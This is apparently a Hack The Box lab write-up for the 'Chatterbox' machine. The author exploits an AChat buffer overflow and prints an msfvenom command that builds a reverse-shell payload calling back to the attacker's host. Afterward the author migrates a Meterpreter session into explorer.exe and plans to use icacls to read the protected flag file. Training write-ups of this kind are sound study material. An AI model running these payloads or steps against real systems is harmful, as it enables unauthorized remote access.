HTB -Chatterbox – 10.10.10.74

Posted by

Finding an open port on this one was murderous, super slow, small groups of nmap scans 1000 ports at a time was the way to discover that the ONLY open port (so far, at least), was 9256.

Further enumeration of that port (nmap –sC –sS –A –p 9256 10.10.10.74):

PORT     STATE SERVICE VERSION
9256/tcp open  achat   AChat chat system

Googling for achat exploits, since that’s literally all I’ve got to go on, yields: https://www.exploit-db.com/exploits/36025/

I changed the shellcode in that to:

msfvenom -a x86 –platform Windows -p windows/shell/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.11 LPORT=4443 exitfunc=thread -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python

From <https://www.reddit.com/r/AskNetsec/comments/6wl04j/issue_with_metasploit_payload_no_encoders_encoded/>

I ran the exploit, and it appears to complete, but I never get a shell back.

I tried it again using a simple windows/shell/reverse_tcp payload, still nothing. My assumption was that Meterpreter was just too much and I needed something simpler, and I’m still pretty sure that’s correct.  I did a fresh reset on the box since it had been 4 days, and got back:

1

So, now, it’s connecting back, but dying after like 10 seconds.  I kept thinking this HAD to work, but none of my commands would execute.  I tried several variations, and what finally worked (with enough time to run ONE command), was using the meterpreter payload, and the multi/handler to catch it.

Unfortunately, I could only run one command, so I had to make it count.  I created the connection, and used ps to list processes, identifying the PID of explorer.exe.  My assumption was something running on the box that was killing unauthorized processes, so if I could mgirate to that before it killed it, I might be able to sustain a connection.

2

Ran the exploit again, but this time used migrate to get to the PID of explorer. Exe.  The connection was stable from here on out.

3

Finally. I am in as user Alfred, and I navigate to his desktop to retrieve the user.txt file.

I can also navigate TO the desktop of the Administrator, but cannot read the root.txt.  I need to determine privesc here.  It’s not even really privesc, because I clearly already have some higher level privs than a usual user would have.  But this file has different permissions that don’t allow me to read it.

There’s a tool in windows that allows you to change the permissions on files from the CLI – icacls.  Since the shell dumped me out in a high priv folder (system32), and I can at least get TO root.txt, I figured I’ve probably got the permissions to change the file and grab the hash.

4

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s